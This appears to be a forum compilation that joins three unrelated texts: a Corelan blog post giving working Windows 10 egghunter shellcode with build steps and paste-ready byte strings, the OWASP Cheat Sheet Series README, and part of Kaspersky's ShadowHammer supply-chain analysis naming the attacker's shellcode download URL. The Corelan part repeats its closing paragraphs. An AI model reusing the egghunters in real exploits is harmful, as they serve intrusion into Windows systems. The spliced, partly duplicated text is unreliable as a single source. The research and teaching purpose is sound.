What really matters is that Corelan Team is back. Well, I'm back. This is my first (technical) post in nearly 3 years, and the first post since Corelan Team kind of "faded out" before that. (In fact, I'm curious to see if (some of) the original Corelan Team members would be able to find spare time again to join forces and start doing/publishing some research. I certainly hope so, but let's see what happens.) As some of you already know, I have recently left my day job (long story, too long for this post; glad to share details over a drink). I have launched a new company called "Corelan Consulting" and I'm trying to make a living through exploit development training and cybersecurity consulting. Trainings are going well, with 2019 almost completely filled up and classes already being planned for 2020. You can find the training schedules here. If you're interested in setting up the Corelan Bootcamp or Corelan Advanced class in your company or at a conference, read the testimonials first and then contact me. I still need to work on my sales skills in relation to locking in consulting gigs, but I'm sure things will work out fine in the end. (Yes, please contact me if you'd like me to work with you; I'm available for part-time governance/risk management & assessment work ;-))

Anyway, while building the 2019 edition of the Corelan Bootcamp and updating the materials for Windows 10, I realised that the wow64 egghunter for Windows 7, written by Lincoln, no longer works on Windows 10. In fact, I kind of expected it to fail, as we already knew that Microsoft keeps changing the syscall numbers with every major Windows release. And since the most commonly used egghunter mechanism is based on the use of a system call, it's clear that changing the number will break the egghunter. By the way, the system calls (and their numbers) are documented here: https://j00ru.vexillium.org/syscalls/nt/64/ (thanks Mateusz "j00ru" Jurczyk). You can find the evolution of the "NtAccessCheckAndAuditAlarm" system call number in the table on the aforementioned website.

Anyway, changing a system call number doesn't really sound all too exciting or difficult, but it also became clear that the argument & stack layout and the behavior of the system call in Windows 10 differ from the Windows 7 version. We found some win10 egghunter PoCs flying around, but discovered that they did not work reliably in real exploits. Lincoln looked at it for a few moments, did some debugging and produced a working version for Windows 10. So, that means we're quite proud to be able to announce a working (wow64) egghunter for Windows 10. The version below has been tested in real exploits and targets.
wow64 egghunter for Windows 10

As explained, the challenge was to figure out where & how the new system call expects its arguments, and how it changes registers & the stack, to make sure that the arguments are always in the right place and that the routine provides the intended functionality: testing if a given page is accessible or not, without making the process die. This is what the updated routine looks like:

"\x33\xD2"              #XOR EDX,EDX
"\x66\x81\xCA\xFF\x0F"  #OR DX,0FFF
"\x33\xDB"              #XOR EBX,EBX
"\x42"                  #INC EDX
"\x52"                  #PUSH EDX
"\x53"                  #PUSH EBX
"\x53"                  #PUSH EBX
"\x53"                  #PUSH EBX
"\x53"                  #PUSH EBX
"\x6A\x29"              #PUSH 29 (system call 0x29)
"\x58"                  #POP EAX
"\xB3\xC0"              #MOV BL,0C0
"\x64\xFF\x13"          #CALL DWORD PTR FS:[EBX] (perform the system call)
"\x83\xC4\x10"          #ADD ESP,0x10
"\x5A"                  #POP EDX
"\x3C\x05"              #CMP AL,5
"\x74\xE3"              #JE SHORT
"\xB8\x77\x30\x30\x74"  #MOV EAX,74303077
"\x8B\xFA"              #MOV EDI,EDX
"\xAF"                  #SCAS DWORD PTR ES:[EDI]
"\x75\xDE"              #JNZ SHORT
"\xAF"                  #SCAS DWORD PTR ES:[EDI]
"\x75\xDB"              #JNZ SHORT
"\xFF\xE7"              #JMP EDI

This egghunter works great on Windows 10, but it assumes you're running inside the wow64 environment (32-bit process on a 64-bit OS). Of course, as Lincoln explained in his blog post, you can simply add a check to determine the architecture and make the egghunter work on a native 32-bit OS as well. You can generate this egghunter with mona.py too; simply run !mona egg -wow64 -winver 10.

When debugging this egghunter (or any wow64 egghunter that is using system calls), you'll notice access violations during the execution of the system call. These access violations can be safely passed through and will be handled by the OS... but the debugger will break every time it sees an access violation. (In essence, the debugger will break as soon as the code attempts to test a page that is not readable. In other words, you'll get an awful lot of access violations, requiring your manual intervention.) If you're using Immunity Debugger, you can simply tell the debugger to ignore the access violations. To do so, click on 'debugging options', open the 'exceptions' tab, and add the following hex values under "Add range":

0xC0000005 - ACCESS VIOLATION
0x80000001 - STATUS_GUARD_PAGE_VIOLATION

Of course, when you have finished debugging the egghunter, don't forget to remove these 2 exceptions again.

Going forward

For sure, MS is entitled to change whatever they want in their operating system. I don't think developers are supposed to issue system calls themselves; I believe they should be using the wrapper functions in ntdll.dll instead. In other words, it should be "safe" for MS to change system call numbers. I don't know what is behind the system call number increment with every Windows version, and I don't know if the system call numbers are going to remain the same forever, as Windows 10 has been labeled the "last Windows version". From an egghunter perspective that would be great: as an increasingly larger group of people adopts Windows 10, the egghunter will have an increasingly larger success ratio as well. But in reality I don't know if that is a valid assumption to make or not. In any case, it made me think: would there be a way to use a different technique to make an egghunter work, without the use of system calls? And if so, would that technique also work on older versions of Windows? And if we're not using system calls, would it work on native x86 and wow64 environments right away? Let's see.
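A quick practical note before moving on: the DWORD 0x74303077 that the hunter loads into EAX is the tag "w00t" in little-endian, and the two consecutive SCAS instructions mean the tag must appear twice in a row in front of the payload. Staging the payload therefore looks roughly like this (a minimal Python sketch; the shellcode bytes are a placeholder):

egg = b"w00t"                   # matches MOV EAX,0x74303077 above
shellcode = b"\xcc"             # placeholder (INT3); use your real payload here
stage = egg + egg + shellcode   # doubled tag; the final JMP EDI lands right after it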
Exception Handling

The original paper on egghunters ("Safely Searching Process Virtual Address Space"), written by skape (2004!), already introduced the use of custom exception handlers to handle the access violation that will occur if you're trying to read from a page that is not accessible. By making the handler point back into the egghunter, the egghunter would be able to move on. The original implementation, unfortunately, no longer seems to work. While doing some testing (many years ago, as well as just recently on Windows 10), it looks like the OS doesn't really allow you to make the exception handler point directly to the stack (I haven't tried the heap, but I expect the same restriction to be in place). In other words, if the egghunter runs from the stack or heap, you wouldn't be able to make the egghunter use itself as exception handler and move on.

Before looking at a possible solution, let's remind ourselves of how the exception handling mechanism works. When the OS sees an exception and decides to pass it to the corresponding thread in the process, it will instruct a function in ntdll.dll to launch the exception handling mechanism within that thread. This routine will check the TEB at offset 0 (accessible via FS:[0]) and will retrieve the address of the topmost record in the exception handling chain on the stack. Each record consists of 2 fields:

struct EXCEPTION_REGISTRATION {
    EXCEPTION_REGISTRATION *nextrecord; // pointer to next record (nseh)
    DWORD handler;                      // pointer to handler function
};

The topmost record contains the address of the routine that will be called first in order to check if the application can handle the exception or not. If that routine fails, the next record in the chain will be tried (either until one of the routines is able to handle the exception, or until the default handler is used, sending the process to heaven). So, in other words, the routine in ntdll.dll will find the record and call the "handler" address (i.e. whatever is placed in the second field of the record).

Translating this into the egghunter world: if we want to maintain control over what happens when an exception occurs, we'll have to create a custom "topmost" SEH record, making sure it is the topmost record at all times during the execution of the egghunter, and we'll have to make the record handler point into a routine that allows our egghunter to continue running and move on with the next page. Again, if our "custom" record is the topmost record, we'll be sure that it will be the first one to be used. Of course we should be careful and take the consequences and effects of running the exception handling mechanism into account:

- The exception handling mechanism will change the value of ESP. It will create an "exception dispatcher stack" frame at the new ESP location, with a pointer to the originating SEH frame at ESP+8. We'll have to "undo" this change to ESP to make sure it points back to the area on the stack where the egghunter is storing its data.
- We should also avoid creating new records all the time. Instead, we should try to reuse the same record over and over again, avoiding pushing data to the stack all the time, so that we don't run out of stack space.
- Additionally, the egghunter needs to be able to run from any location in memory.
- Finally, whatever we put as "SE Handler" (second field of the record) has to be SafeSEH compatible. Unfortunately that is the weak spot of my "solution".
Additionally, my routine won't work if SEHOP is active (but that's not active by default on client systems, IIRC). Creating our own custom SEH record means that we're going to be writing something to the stack, overwriting/damaging what is already there. So, if your egghunter/shellcode is also on the stack around that location, you may want to adjust ESP before running the egghunter. Just sayin'.

This is what my SEH based egghunter looks like (ready to compile with nasm):

; Universal SEH based egg hunter (x86 and wow64)
; tested on Windows 7 & Windows 10
; written by Peter Van Eeckhoutte (corelanc0d3r)
; www.corelan.be - www.corelan-training.com - www.corelan-consulting.com
;
; warning: will damage stack around ESP
;
; usage: find a non-safeseh protected pointer to pop/pop/ret
; and put it in the placeholder below
;
[BITS 32]
CALL $+4                  ; getPC routine
RET
POP ECX
ADD ECX,0x1d              ; offset to "handle" routine
; set up SEH record
XOR EBX,EBX
PUSH ECX                  ; remember where our 'custom' SE Handler routine will be
PUSH ECX                  ; p/p/r will fly over this one
PUSH 0x90c3585c           ; trigger p/p/r again :)
PUSH 0x44444444           ; Replace with P/P/R address ** PLACEHOLDER **
PUSH 0x04EB5858           ; SHORT JUMP
MOV DWORD [FS:EBX],ESP    ; put our SEH record at the top of the chain
JMP nextpage

handle:                   ; our custom handler
SUB ESP,0x14              ; undo changes to ESP
XOR EBX,EBX
MOV DWORD [FS:EBX],ESP    ; make our SEH record topmost again
MOV EDX, [ESP-4]          ; pick up saved EDX
INC EDX

nextpage:
OR DX, 0x0FFF
INC EDX
MOV [ESP-4], EDX          ; remember where we are searching
MOV EAX, 0x74303077       ; w00t
MOV EDI, EDX
SCASD
JNZ nextpage+5
SCASD
JNZ nextpage+5
JMP EDI

Let's look at the various components of the egg hunter. First, the hunter starts with a "GetPC" routine (designed to find its own absolute address in memory), followed by an instruction that adds 0x1d bytes to the address it was able to retrieve using that GetPC routine. After adding this offset, ECX will contain the absolute address where the actual "handle" routine will be in memory (referenced by the label "handle" in the code above). Keep in mind, the egghunter needs to be able to determine this location dynamically at runtime, because it will use the exception handler mechanism to come back to itself and continue running. That means we'll need to know (determine) where it is and store the reference on the stack, so we can retrieve/jump to it later during the exception handling mechanism.

Next, the code creates a new custom SEH record. Although a SEH record only takes 2 fields, the code is actually pushing 5 specially crafted values on the stack. Only the last 2 of them will become the SEH record; the other ones are used to allow the exception handler to restore ESP and continue execution of the egghunter. Let's look at what gets pushed and why:

- PUSH ECX: this is the address where the "handle" routine is in memory, as determined by the GetPC routine earlier. The exception handler will need to eventually return to this one.
- PUSH ECX: we're pushing the address again, but this one won't be used. We'll be using the pop/pop/ret pointer twice: the first time to bring execution from the exception handler back to our code, the second time to return to the "ECX" stored on the stack. This second ECX is just there to compensate for the second POP in the p/p/r; you can push anything you like on the stack.
- PUSH 0x90c3585C: this code will get executed. It's a POP ESP, POP EAX, RET.
This will reset the stack back to the original location where we stored the SEH record. The RET will transfer execution back to the p/p/r pointer on the stack (part of the SEH record). In other words, the p/p/r pointer will be used twice; the second time, it will eventually return to the address of ECX that was stored on the stack (see the previous PUSH ECX instructions).

Next, the real SEH record is created by pushing 2 more values to the stack:

- A pointer to P/P/R (must be a non-SafeSEH protected pointer). We have to use a p/p/r because we can't make this handler field point directly into the stack (or heap). As we can't just make the exception mechanism go back directly to our code, we'll use the pop/pop/ret to maintain control over the execution flow. In the code above, you'll have to replace the 0x44444444 value with the address of a non-SafeSEH protected pop/pop/ret. Then, when an exception occurs (i.e. when the egghunter reaches a page that is not accessible), the pop/pop/ret will get executed for the first time, returning to the 4 bytes in the first field of the SEH record.
- In the first field of the SEH record, I have placed a 2-pops-and-short-jump-forward sequence. This will adjust the stack slightly, so the pointer to the SEH record ends up at the top of the stack. Next it will jump to the instruction sequence that was pushed onto the stack earlier on (0x90C3585C). As explained, that sequence will trigger the POP/POP/RET again, which will eventually return to the stored ECX pointer (which is where the egghunter is).

To complete the creation of the SEH record and mark it as the topmost record, we simply write its location into the TEB. As our new custom SEH record currently sits at ESP, we can simply write the value of ESP into the TEB at offset 0 (MOV DWORD [FS:EBX],ESP). (That's why we cleared EBX in the first place.)

At this point, the egghunter is ready to test if a page is readable. The code uses EDX as the reference for where to read from. The routine starts by going to the end of the page (OR DX, 0x0FFF), then goes to the start of the next page (INC EDX), and then stores the value of EDX on the stack (at [ESP-4]) so the exception handler can pick it up later. If the read attempt (SCASD) fails, an access violation will be triggered. The access violation will use our custom SEH record (as it is supposed to be the topmost record), and that routine is designed to resume execution of the egghunter (by running the "handle" routine, which will eventually restore the EDX pointer from the stack and move on to the next page). The "handle" routine will:

- Adjust the stack again, correcting its position to put it where it is/should be when running the egghunter (SUB ESP,0x14).
- Make sure our custom record is the topmost SEH record again (anticipating the case where some other code has added a new topmost record).
- Pick up the reference from the stack (where we stored the last address we tried to access) and move on (with the next page).

If a page is readable, the egghunter will check for the presence of the tag, twice. If the tags are found, the final "JMP EDI" will tell the CPU to run the code placed right after the double tag. When debugging the egghunter, you'll notice that it throws access violations (when the code tries to access a page that is not accessible).
Of course, in this case, these access violations are absolutely normal, but you'll still have to pass the exceptions back to the application (Shift F9). You can also configure Immunity Debugger to ignore (and pass) the exceptions automatically by configuring the exceptions. To do so, click on 'debugging options', open the 'exceptions' tab, and add the following hex values under "Add range":

0xC0000005 - ACCESS VIOLATION
0x80000001 - STATUS_GUARD_PAGE_VIOLATION

Of course, when you have finished debugging the egghunter, don't forget to remove these 2 exceptions again.

In order to use the egghunter, you'll need to convert the asm instructions into opcodes first. To do so, you'll need to install nasm (I have used the Win32 installer from https://www.nasm.us/pub/nasm/releasebuilds/2.14.02/win32/). Save the asm code snippet above into a text file (for instance "c:\dev\win10_egghunter_seh.nasm"). Next, run nasm to convert it into a binary file that contains the opcodes:

"C:\Program Files (x86)\NASM\nasm.exe" -o c:\dev\win10_egghunter_seh.obj c:\dev\win10_egghunter_seh.nasm

Next, dump the contents of the binary file to a hex format that you can use in your scripts and exploits:

python c:\dev\bin2hex.py c:\dev\win10_egghunter_seh.obj

(You can find a copy of the bin2hex.py script in Corelan's github repository.) If all goes well, this is what you'll get:

"\xe8\xff\xff\xff\xff\xc3\x59\x83"
"\xc1\x1d\x31\xdb\x51\x51\x68\x5c"
"\x58\xc3\x90\x68\x44\x44\x44\x44"
"\x68\x58\x58\xeb\x04\x64\x89\x23"
"\xeb\x0d\x83\xec\x14\x31\xdb\x64"
"\x89\x23\x8b\x54\x24\xfc\x42\x66"
"\x81\xca\xff\x0f\x42\x89\x54\x24"
"\xfc\xb8\x77\x30\x30\x74\x89\xd7"
"\xaf\x75\xf1\xaf\x75\xee\xff\xe7"

Again, don't forget to replace the \x44\x44\x44\x44 (end of the third line) with the address of a pop/pop/ret (and to store the address in little endian, if you are editing the bytes). Python friendly copy/paste code:

egghunter = ("\xe8\xff\xff\xff\xff\xc3\x59\x83"
             "\xc1\x1d\x31\xdb\x51\x51\x68\x5c"
             "\x58\xc3\x90\x68")
egghunter += "\x??\x??\x??\x??"  # replace with pointer to pop/pop/ret. Use !mona seh
egghunter += ("\x68\x58\x58\xeb\x04\x64\x89\x23"
              "\xeb\x0d\x83\xec\x14\x31\xdb\x64"
              "\x89\x23\x8b\x54\x24\xfc\x42\x66"
              "\x81\xca\xff\x0f\x42\x89\x54\x24"
              "\xfc\xb8\x77\x30\x30\x74\x89\xd7"
              "\xaf\x75\xf1\xaf\x75\xee\xff\xe7")

I have not added the routine to mona.py yet (but I will, eventually, at some point). Of course, if you see room for improvement and/or are able to reduce the size of the egghunter, please don't hesitate to let me know (I'll be waiting for your feedback for a while before adding it to mona). I'd also love to hear if the egghunter works for you, and if it works across Windows versions and architectures (32-bit systems, older Windows versions, etc.).

That's all folks! Thanks for reading! I hope you have enjoyed this brand new article, and I hope you're as excited about the future as I am. If you would like to hang out, discuss infosec topics, or ask (and answer) questions, please sign up to our Slack workspace. To access the workspace:

- Head over to https://www.facebook.com/corelanconsulting (and like the page while you're at it). You don't need a facebook account; the page is public.
- Scroll through the posts and look for the one that contains the invite link to Slack.
- Register, done.

Also, feel free to follow us on Twitter (@corelanconsult) to stay informed about new articles and blog posts.

Corelan Training & Corelan Consulting

This article is just a small example of what you'll learn in our Corelan Bootcamp.
I have not added the routine to mona.py yet (but I will, eventually, at some point). Of course, if you see room for improvement, and/or are able to reduce the size of the egghunter, please don't hesitate to let me know. (I'll be waiting for your feedback for a while before adding it to mona.) Of course I'd love to hear if the egghunter works for you, and if it works across Windows versions and architectures (32bit systems, older Windows versions, etc). That's all folks. Thanks for reading! I hope you have enjoyed this brand new article, and I hope you're as excited about the future as I am. If you would like to hang out, discuss infosec topics, and ask (and answer) questions, please sign up to our Slack workspace. To access the workspace: Head over to https://www.facebook.com/corelanconsulting (and like the page while you're at it). You don't need a facebook account, the page is public. Scroll through the posts and look for the one that contains the invite link to Slack. Register, done. Also, feel free to follow us on Twitter (@corelanconsult) to stay informed about new articles and blog posts.
Corelan Training & Corelan Consulting
This article is just a small example of what you'll learn in our Corelan Bootcamp. If you'd like to take one of our Corelan classes, check our schedules at https://www.corelan-training.com/index.php/training-schedules. If you prefer to set up a class at your company or conference, don't hesitate to contact me via this form. As explained at the start of the article: the trainings and consulting gigs are now my main source of income. I am only able to do research and publish information for free if I can make a living as well. This website is supported, hosted and funded by Corelan Consulting. The more classes I can teach and the more consulting I can do, the more time I can invest in research and the publication of tutorials. Thanks! © 2019, Peter Van Eeckhoutte (corelanc0d3r). All rights reserved. Sursa: https://www.corelan.be/index.php/2019/04/23/windows-10-egghunter/
-
-
-
-
Welcome to OWASP Cheat Sheet Series V2
This repository contains all the cheat sheets of the project and represents the V2 of the OWASP Cheat Sheet Series project.
Table of Contents
Cheat Sheets index
Special thanks
Editor & validation policy
Conversion rules
How to setup my contributor environment?
How to contribute?
Offline website
Project leaders
Core technical review team
PR usage for core committers
Project logo
Folders
License
Code of conduct
Cheat Sheets index
The following indexes are provided:
This index references all released cheat sheets, sorted alphabetically. It is automatically generated by this script.
This index references all released cheat sheets using the OWASP ASVS project as the reading source. It is manually managed in order to allow contributions alongside custom content.
This index references all released cheat sheets using the OWASP Proactive Controls project as the reading source. It is manually managed in order to allow contributions alongside custom content.
You can also search this repository using keywords via this URL: https://github.com/OWASP/CheatSheetSeries/search?q=[KEYWORDS] Example: https://github.com/OWASP/CheatSheetSeries/search?q=csrf More information about the GitHub search feature can be found here.
Project leaders
Dominique Righetto.
Jim Manico.
Core technical review team
Any GitHub member is free to add a comment on any Proposal (issue) or PR. However, we have created an official core technical review team (core committers) in order to:
Review all PRs/Proposals in a consistent, regular way using GitHub's review feature.
Extend the range of technologies known by the review team.
Allow several technical opinions on a Proposal/PR; all exchanges are public because we use the GitHub comment feature.
Decisions of the core technical review team carry the same weight as those of the project leaders, so if a reviewer rejects a PR (the rejection must be technically documented and explained), the project leaders will apply that decision.
Members:
Elie Saad.
Jakub Maćkowski.
Dominique Righetto.
Jim Manico.
PR usage for core committers
For the following kinds of modification, the PR system is used by the core committers in order to allow peer review via the GitHub PR review system:
Adding a new cheat sheet.
Deep modification of an existing cheat sheet.
This is the procedure:
Clone the project.
Switch to the master branch: git checkout master
Create a branch named feature_request_[ID], where [ID] is the number of the linked issue opened prior to the PR (to follow the contribution process): git checkout -b feature_request_[ID]
Switch to this new branch (normally this is already the case): git checkout feature_request_[ID]
Do the expected work.
Push the new branch: git push origin feature_request_[ID]
When the work is ready for review, create a pull request by visiting this link: https://github.com/OWASP/CheatSheetSeries/pull/new/feature_request_[ID]
Implement the modifications requested by the reviewers; once the core technical review team approves, the PR is merged.
Once merged, delete the branch using this GitHub feature. See the project's current branches.
Project logo
The project's official logo files are hosted here.
Folders
cheatsheets_excluded: Contains the cheat sheet markdown files converted with PANDOC for which a discussion must be held in order to decide whether to include them in the V2 of the project, because their content has not been updated in a long time or is no longer relevant. See this discussion.
cheatsheets: Contains the final cheat sheet files. Any .md file present in this folder is considered released.
assets: Contains the assets used by the cheat sheets (images, pdf, zip...). The naming convention is [CHEAT_SHEET_MARKDOWN_FILE_NAME]_[IDENTIFIER].[EXTENSION]. Use the PNG format for images.
scripts: Contains all the utility scripts used to operate the project (markdown linter audit, dead link identification...).
templates: Contains templates used for the different kinds of files (cheat sheet...).
.github: Contains materials used to configure different GitHub behaviors.
.circleci / .travis.yml (file): Contains the definitions of the integration jobs used to control the integrity and consistency of the whole project: TravisCI is used to perform compliance-check actions on each Push/Pull Request. It must be/stay as fast as possible (currently under 2 minutes) in order to provide rapid compliance feedback about the Push/Pull Request. CircleCI is used to perform longer operations such as build, publish and deploy actions.
Offline website
Unfortunately, PDF file generation is not possible because the content is cut off in some cheat sheets, for example the abuse case one. However, to make it possible to consult the whole collection of cheat sheets fully offline, a script that generates an offline site using GitBook has been created. The script is here.
book.json: GitBook configuration file.
Preface.md: Project preface description applied to the generated site.
Automated build
This link allows you to download a build (zip archive) of the offline website.
Manual build
Use the commands below to generate the site:
# Your python version must be >= 3.5
$ python --version
Python 3.5.3
# Dependencies:
# sudo apt install -y nodejs
# sudo npm install gitbook-cli -g
$ cd scripts
$ bash Generate_Site.sh
Generate a offline portable website with all the cheat sheets...
Step 1/5: Init work folder.
Step 2/5: Generate the summary markdown page.
Index updated.
Summary markdown page generated.
Step 3/5: Create the expected GitBook folder structure.
Step 4/5: Generate the site.
info: found 45 pages
info: found 86 asset files
info: >> generation finished with success in 14.2s !
Step 5/5: Cleanup.
Generation finished to the folder: ../generated/site
$ cd ../generated/site/
$ ls -l
drwxr-xr-x 1 Feb 3 11:05 assets
drwxr-xr-x 1 Feb 3 11:05 cheatsheets
drwxr-xr-x 1 Feb 3 11:05 gitbook
-rw-r--r-- 1 Feb 3 11:05 index.html
-rw-r--r-- 1 Feb 3 11:05 search_index.json
Conversion rules
Use the markdown syntax described in this guide.
Use this sheet for superscript and subscript characters.
Use this sheet for arrow (left, right, up, down) characters.
Store all assets in the assets folder and use the following syntax: ![ALTERNATE_NAME](../assets/ASSET_NAME.EXT) for the insertion of an image. Use the PNG format for images (this software can be used to handle format conversion). Use [ALTERNATE_NAME](../assets/ASSET_NAME.EXT) for the insertion of other kinds of media (pdf, zip...).
Use the ATX style (# syntax) for section headings.
Use **bold** syntax for bold text.
Use *italic* syntax for italic text.
Use TABs for nested lists, not spaces.
Use code fencing along with syntax highlighting for code snippets (avoid horizontal scrollbars when possible).
If you use the {{ or }} pattern in code fencing, then add a space between the two curly braces (e.g. { {), otherwise it breaks the GitBook generation process. A similar restriction applies to the cheat sheet file name: only the following syntax is allowed: [a-zA-Z_]+.
No HTML code is allowed, only markdown syntax!
Use this site for the generation of tables.
Use a single new line between a section heading and the beginning of its content.
Editor & validation policy
Visual Studio Code is used for the work on the markdown files as well as on the scripts. The file Project.code-workspace is the workspace file used to open the project in VSCode. The following plugin is used to validate the markdown content. The file .markdownlint.json defines the central validation policy applied at the VSCode (IDE) and TravisCI (CI) levels. Details about the rules are here. The file .markdownlinkcheck.json defines the configuration used, at the TravisCI level, to validate all web and relative links used in the cheat sheets with this tool.
How to setup my contributor environment? See here.
How to contribute? See here.
Special thanks
A special thank you to the following people for the help provided during the migration:
ThunderSon: substantial help with updating the OWASP wiki links for all the migrated cheat sheets.
mackowski: substantial help with updating the OWASP wiki links for all the migrated cheat sheets.
License
See here.
Sursa: https://github.com/OWASP/CheatSheetSeries
-
Operation ShadowHammer: a high-profile supply chain attack By GReAT, AMR on April 23, 2019. 10:00 am In late March 2019, we briefly highlighted our research on ShadowHammer attacks, a sophisticated supply chain attack involving ASUS Live Update Utility, which was featured in a Kim Zetter article on Motherboard. The topic was also one of the research announcements made at the SAS conference, which took place in Singapore on April 9-10, 2019. Now it is time to share more details about the research with our readers. At the end of January 2019, Kaspersky Lab researchers discovered what appeared to be a new attack on a large manufacturer in Asia. Our researchers named it “Operation ShadowHammer”. Some of the executable files, which were downloaded from the official domain of a reputable and trusted large manufacturer, contained apparent malware features. Careful analysis confirmed that the binary had been tampered with by malicious attackers. It is important to note that any, even tiny, tampering with executables in such a case normally breaks the digital signature. However, in this case, the digital signature was intact: valid and verifiable. We quickly realized that we were dealing with a case of a compromised digital signature. We believe this to be the result of a sophisticated supply chain attack, which matches or even surpasses the ShadowPad and the CCleaner incidents in complexity and techniques. The reason that it stayed undetected for so long is partly the fact that the trojanized software was signed with legitimate certificates (e.g. “ASUSTeK Computer Inc.”). The goal of the attack was to surgically target an unknown pool of users, who were identified by their network adapters’ MAC addresses. To achieve this, the attackers had hardcoded a list of MAC addresses into the trojanized samples and the list was used to identify the intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from more than 200 samples used in the attack. There might be other samples out there with different MAC addresses on their lists, though. Technical details The research started upon the discovery of a trojanized ASUS Live Updater file (setup.exe), which contained a digital signature of ASUSTeK Computer Inc. and had been backdoored using one of the two techniques explained below. In earlier variants of ASUS Live Updater (i.e. MD5:0f49621b06f2cdaac8850c6e9581a594), the attackers replaced the WinMain function in the binary with their own. This function copies a backdoor executable from the resource section using a hardcoded size and offset to the resource. Once copied to the heap memory, another hardcoded offset, specific to the executable, is used to start the backdoor. The offset points to a position-independent shellcode-style function that unwraps and runs the malicious code further. Some of the older samples revealed the project path via a PDB file reference: “D:\C++\AsusShellCode\Release\AsusShellCode.pdb“. This suggests that the attackers had exclusively prepared the malicious payload for their target. A similar tactic of precise targeting has become a persistent property of these attackers. A look at the resource section used for carrying the malicious payload revealed that the attackers had decided not to change the file size of the ASUS Live Updater binary. They changed the resource contents and overwrote a tiny block of the code in the subject executable. The layout of that patched file is shown below. 
We managed to find the original ASUS Live Updater executable which had been patched and abused by the attackers. As a result, we were able to recover the overwritten data in the resource section. The file we found was digitally signed and certainly had no infection present. Both the legitimate ASUS executable and the resource-embedded updater binary contain timestamps from March 2015. Considering that the operation took place in 2018, this raises the following question: why did the attackers choose an old ASUS binary as the infection carrier? Another injection technique was found in more recent samples. Using that technique, the attackers patched the code inside the C runtime (CRT) library function "___crtExitProcess". The malicious code executes a shellcode loader instead of the standard function "___crtCorExitProcess". This way, the execution flow is passed to another address which is located at the end of the code section. The attackers used a small decryption routine that can fit into a block at the end of the code section, which has a series of zero bytes in the original executable. They used the same source executable file from ASUS (compiled in March 2015) for this new type of injection. The loader code copies another block of encrypted shellcode from the file's resource section (of the type "EXE") to a newly allocated memory block with read-write-execute attributes and decrypts it using a custom block-chaining XOR algorithm, where the first dword is the initial seed and the total size of the shellcode is stored at an offset of +8. We believe that the attackers changed the payload start routine in an attempt to evade detection. Apparently, they switched to a better method of hiding their embedded shellcode at some point between the end of July and September 2018.
ShadowHammer downloader
The compromised ASUS binaries carried a payload that was a Trojan downloader. Let us take a closer look at one such ShadowHammer downloader extracted from a copy of the ASUS Live Updater tool with MD5:0f49621b06f2cdaac8850c6e9581a594. It has the following properties:
MD5: 63f2fe96de336b6097806b22b5ab941a
SHA1: 6f8f43b6643fc36bae2e15025d533a1d53291b8a
SHA256: 1bb53937fa4cba70f61dc53f85e4e25551bc811bf9821fc47d25de1be9fd286a
Digital certificate fingerprint: 0f:f0:67:d8:01:f7:da:ee:ae:84:2e:9f:e5:f6:10:ea
File Size: 1'662'464 bytes
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Link Time: 2018.07.10 05:58:19 (GMT)
The relatively large file size is explained by the presence of partial data from the original ASUS Live Updater application appended to the end of the executable. The attackers took the original Live Updater and overwrote it with their own PE executable starting from the PE header, so the file contains the actual PE image, whose size is only 40448 bytes, while the rest comes from ASUS. The malicious executable was created using Microsoft Visual C++ 2010. The core function of this executable is in a subroutine which is called from WinMain, but is also executed directly via a hardcoded offset from the code injected into ASUS Live Updater. The code uses dynamic import resolution with its own simple hashing algorithm. Once the imports are resolved, it collects the MAC addresses of all available network adapters and calculates an MD5 hash for each of these. After that, the hashes are compared against a table of 55 hardcoded values. Other variants of the downloader contained a different table of hashes, and in some cases, the hashes were arranged in pairs.
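To illustrate the targeting check just described, here is a minimal Python sketch. Two things are assumptions rather than recovered facts: the exact byte format of the MAC address fed to MD5, and the table entries themselves, which are placeholders.

import hashlib

HARDCODED_MD5 = {
    "d41d8cd98f00b204e9800998ecf8427e",   # placeholder entries; real samples
    "0123456789abcdef0123456789abcdef",   # carried tables of 8 to 307 hashes
}

def mac_md5(mac: str) -> str:
    raw = bytes.fromhex(mac.replace(":", "").replace("-", ""))  # assumed format
    return hashlib.md5(raw).hexdigest()

def is_target(local_macs) -> bool:
    # True if any local adapter's MD5(MAC) appears in the hardcoded table
    return any(mac_md5(m) in HARDCODED_MD5 for m in local_macs)

print(is_target(["00-50-56-C0-00-08"]))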
In other words, the malware iterates through the table of hashes and compares each entry to the MD5 hashes of the local adapters' MAC addresses. This way, the target system is recognized and the malware proceeds to the next stage, downloading a binary object from https://asushotfix[.]com/logo.jpg (or https://asushotfix[.]com/logo2.jpg in newer samples). The malware also sends the first hash from the matched entry as a parameter in the request to identify the victim. The server response is expected to be executable shellcode, which is placed in newly allocated memory and started. Our investigation uncovered 230 unique samples with different shellcodes and different sets of MAC address hashes. This leads us to believe that the campaign targeted a vast number of people or companies. In total, we were able to extract 14 unique hash tables. The smallest hash table found contained eight entries and the biggest, 307 entries. Interestingly, although the subset of hash entries kept changing, some of the entries were present in all of the tables. For all users whose MAC did not match the expected values, the code would create an INI file located two directory levels above the current executable and named "idx.ini". Three values were written into the INI file under the [IDX_FILE] section:
[IDX_FILE]
XXX_IDN=YYYY-MM-DD
XXX_IDE=YYYY-MM-DD
XXX_IDX=YYYY-MM-DD
where YYYY-MM-DD is a date one week ahead of the current system date. The code injected by the attackers was discovered on the machines of over 57,000 Kaspersky Lab users. It would run but remain silent on systems that were not primary targets, making it almost impossible to discover the anomalous behavior of the trojanized executables. The exact total of affected users around the world remains unknown.
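A small sketch of that idx.ini fallback, assuming only what is stated above (a file two directory levels above the current executable, with three week-ahead date values under [IDX_FILE]); everything else is illustrative:

import os, sys
from datetime import date, timedelta

def write_idx_ini(current_exe: str) -> None:
    stamp = (date.today() + timedelta(days=7)).strftime("%Y-%m-%d")
    path = os.path.normpath(
        os.path.join(os.path.dirname(current_exe), "..", "..", "idx.ini"))
    with open(path, "w") as f:
        f.write("[IDX_FILE]\n")
        for key in ("XXX_IDN", "XXX_IDE", "XXX_IDX"):  # key names as observed
            f.write(f"{key}={stamp}\n")

write_idx_ini(sys.argv[0])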
Digital signature abuse
A lot of the computer security software deployed today relies on integrity control of trusted executables, and digital signature verification is one such method. In this attack, the attackers managed to get their code signed with the certificate of a big vendor. How was that possible? We do not have definitive answers, but let us take a look at what we observed. First of all, we noticed that all backdoored ASUS binaries were signed with two different certificates. Here are their fingerprints:
0ff067d801f7daeeae842e9fe5f610ea
05e6a0be5ac359c7ff11f4b467ab20fc
